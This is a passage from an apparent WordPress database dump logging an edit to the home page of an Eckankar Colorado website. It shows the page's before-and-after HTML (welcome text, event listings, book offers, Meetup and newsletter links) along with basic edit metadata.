youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236994,40278,'post_prev_post_content','<div style=\"height: 150px; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #08f;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236988,40277,'_user_email','nada@zipnadanot.org'),(236989,40277,'_server_remote_addr','76.130.120.x'),(236990,40277,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236991,40278,'post_id','7160'),(236992,40278,'post_type','page'),(236993,40278,'post_title','Home'),(236985,40277,'_message_key','post_updated'),(236986,40277,'_user_id','2'),(236987,40277,'_user_login','S8zhaBda'),(236984,40277,'post_new_post_content','<div style=\"height: 150px; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #08f;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; 